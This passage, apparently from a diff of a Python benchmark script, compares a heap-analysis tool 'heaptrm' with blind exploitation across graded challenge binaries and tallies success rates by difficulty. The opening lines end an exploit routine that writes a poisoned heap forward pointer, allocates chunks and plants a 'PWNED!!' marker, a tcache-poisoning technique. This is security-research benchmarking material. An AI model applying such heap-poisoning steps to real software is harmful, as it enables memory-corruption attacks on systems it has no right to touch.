| 206 |
+
p.close(); return False, turns
|
| 207 |
+
|
| 208 |
+
# Execute with computed poisoned fd
|
| 209 |
+
edit(1, p64(poisoned).hex()[:16])
|
| 210 |
+
alloc(3, sc)
|
| 211 |
+
alloc(4, sc)
|
| 212 |
+
edit(4, b"PWNED!!".hex())
|
| 213 |
+
result = show(2)
|
| 214 |
+
|
| 215 |
+
p.close()
|
| 216 |
+
return result and b"50574e4544" in result, turns
|
| 217 |
+
|
| 218 |
+
except:
|
| 219 |
+
try: p.close()
|
| 220 |
+
except: pass
|
| 221 |
+
return False, turns
|
| 222 |
+
|
| 223 |
+
|
| 224 |
+
def main():
|
| 225 |
+
manifest = json.loads((SUITE / "manifest.json").read_text())
|
| 226 |
+
|
| 227 |
+
print("=" * 80)
|
| 228 |
+
print(f"SUITE BENCHMARK: heaptrm vs blind | {len(manifest)} challenges | {TRIALS} trials each")
|
| 229 |
+
print("=" * 80)
|
| 230 |
+
|
| 231 |
+
results = []
|
| 232 |
+
for config in manifest:
|
| 233 |
+
name = config["name"]
|
| 234 |
+
binary = SUITE / name
|
| 235 |
+
if not binary.exists():
|
| 236 |
+
continue
|
| 237 |
+
|
| 238 |
+
ht_wins = 0
|
| 239 |
+
bl_wins = 0
|
| 240 |
+
ht_turns = 0
|
| 241 |
+
bl_turns = 0
|
| 242 |
+
|
| 243 |
+
for t in range(TRIALS):
|
| 244 |
+
s, turns = exploit_heaptrm(binary, config)
|
| 245 |
+
ht_wins += int(s)
|
| 246 |
+
ht_turns += turns
|
| 247 |
+
|
| 248 |
+
s, turns = exploit_blind(binary, config)
|
| 249 |
+
bl_wins += int(s)
|
| 250 |
+
bl_turns += turns
|
| 251 |
+
|
| 252 |
+
r = {
|
| 253 |
+
"name": name,
|
| 254 |
+
"difficulty": config["difficulty"],
|
| 255 |
+
"uaf_read": config["uaf_read"],
|
| 256 |
+
"addr_leak": config["addr_leak"],
|
| 257 |
+
"noise": f"{config['noise_min']}-{config['noise_max']}",
|
| 258 |
+
"ht_rate": ht_wins / TRIALS,
|
| 259 |
+
"bl_rate": bl_wins / TRIALS,
|
| 260 |
+
"ht_turns": ht_turns / TRIALS,
|
| 261 |
+
"bl_turns": bl_turns / TRIALS,
|
| 262 |
+
}
|
| 263 |
+
results.append(r)
|
| 264 |
+
|
| 265 |
+
delta = r["ht_rate"] - r["bl_rate"]
|
| 266 |
+
marker = ">>>" if delta > 0.5 else "==" if abs(delta) < 0.1 else ">"
|
| 267 |
+
print(f" {name} [{config['difficulty']:8s}] heaptrm={ht_wins}/{TRIALS} blind={bl_wins}/{TRIALS} "
|
| 268 |
+
f"leak={config['addr_leak']:7s} uaf={config['uaf_read']} noise={r['noise']} {marker}")
|
| 269 |
+
|
| 270 |
+
# Summary
|
| 271 |
+
print("\n" + "=" * 80)
|
| 272 |
+
print("SUMMARY BY DIFFICULTY")
|
| 273 |
+
print("=" * 80)
|
| 274 |
+
|
| 275 |
+
for diff in ["easy", "medium", "hard", "extreme"]:
|
| 276 |
+
group = [r for r in results if r["difficulty"] == diff]
|
| 277 |
+
if not group:
|
| 278 |
+
continue
|
| 279 |
+
ht_avg = sum(r["ht_rate"] for r in group) / len(group)
|
| 280 |
+
bl_avg = sum(r["bl_rate"] for r in group) / len(group)
|
| 281 |
+
print(f" {diff:8s}: heaptrm={ht_avg*100:.0f}% blind={bl_avg*100:.0f}% "
|
| 282 |
+
f"delta={ht_avg*100-bl_avg*100:+.0f}% ({len(group)} challenges)")
|
| 283 |
+
|
| 284 |
+
# Overall
|
| 285 |
+
ht_total = sum(r["ht_rate"] for r in results) / len(results)
|
| 286 |
+
bl_total = sum(r["bl_rate"] for r in results) / len(results)
|
| 287 |
+
print(f"\n OVERALL: heaptrm={ht_total*100:.0f}% blind={bl_total*100:.0f}% "
|
| 288 |
+
f"delta={ht_total*100-bl_total*100:+.0f}%")
|
| 289 |
+
|
| 290 |
+
# Save
|
| 291 |
+
(SUITE / "benchmark_results.json").write_text(json.dumps(results, indent=2))
|
| 292 |
+
|
| 293 |
+
|
| 294 |
+
if __name__ == "__main__":
|
| 295 |
+
main()
|